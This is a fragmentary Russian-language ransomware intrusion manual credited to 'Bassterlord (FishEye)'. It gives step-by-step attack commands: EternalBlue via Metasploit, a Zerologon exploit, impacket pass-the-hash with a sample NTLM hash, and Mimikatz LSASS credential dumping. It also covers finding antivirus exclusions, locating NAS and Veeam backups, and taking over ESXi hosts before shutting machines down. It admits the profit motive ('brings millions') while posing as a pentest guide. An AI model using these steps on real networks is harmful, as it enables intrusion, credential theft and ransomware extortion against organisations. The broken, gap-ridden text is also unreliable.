Академический Документы
Профессиональный Документы
Культура Документы
от Bassterlord (FishEye)
Предисловие
4. Любая винда 10
5. Nmap ТЫЦ
6. Мимик ТЫЦ
7. GMER ТЫЦ
9. Pysecdump ТЫЦ
15. Блюкип эксплоит для 3389 под виндовс (лежит рядом в архиве)
Далее вводим
cd impacket
Вводим команды
cd c:\impacket
cve-2020-1472-exploit.py
http://masscan.online/ru
Заходим в кали
cd Fortigate
Это и будет наш материал для работы копируем наш валид на виртуалку с
виндой и смотрим следующий раздел.
RANSOMWARE = Терроризм
Все ваши действия которые вы будете
выполнять далее вы делаете на свой страх и
риск.
Однако данный риск приносит миллионы!
Я не пропагандирую рансом это просто ман по
пентесту.
Начало работы
Первым делом мы заходим в нашу виртуалку под виндовс
10.102.96.0 — 255.255.255.0
10.102.96.0 — 10.102.96.255
10.102.0.0 — 255.255.0.0
10.102.0.0 — 10.102.255.255
Если мы видим
0.0.0.0 — 0.0.0.0
192.168.0.0 — 192.168.255.255
интеграция с нмап
Ставим галочку на етернал и запускаем сканирование
Общие:135,137,139,445,8080,80,443
Oracle: 1521,1522
Nfs: 111,1039,1047,1048,2049
Iscsi: 860,3260
replication: 902,31031,8123,8043,5480,5722
use exploit/windows/smb/ms17_010_psexec
exploit
set SessionCommunicationTimeout 0
exploit
getsystem
load kiwi
Тогда можно
shell
net group
cd impacket/examples
Жмем enter нас попросит ввести пароль вводим в слепую kali и жмем enter
Возвращаемся в кали.
вводим cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27
либо
support Pa$$wo0rd
Далее заходим DC и снимаем креды домен админов мимиком 64.exe или 32.exe
Gmer
PowerTool
переходим по пути:
Компьютер\HKEY_LOCAL_MACHINE\SOFTWARE
Если находим смотрим все подпапки которые есть в папке с ав наша цель
найти папки и значения внутри них с названием Exclusions (исключения)
С:\users\admin\java.exe
5000,5001
а бекапы
Veeam: 9443,9392,9393,9401,6160
Обычно насы висят вне домена первым делом смотрим скан если у нас
появился доступ к ним из обычного скана с учетками домен админа все
супер.
Однако если насы в воркгруппе можно пробить всех домен админов и
попробовать залогинится в них по кредам без домена с пробитых учеток
через веб интерефейс открыв айпи наса через браузер и указав порт наса
через двоеточие.
вводим логин домен админа без домена и его пароль. теперь все готово для
авторизации, заходим в esx хост используя креды доменного админа и
сбрасываем root пасс
Выключаешь машины
Первым делом она поможет нам запустить любой файл на всех тачках к
которым у нас есть доступ.
и procdump.exe
Итак мы вошли в тачку делаем
cd C:\
pysecdump.exe -s
Далее делаем
sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full
Не всегда срабатывает!
и прописать следующее:
Создаем прослушиватель.
Там же делаем
Дальше идем в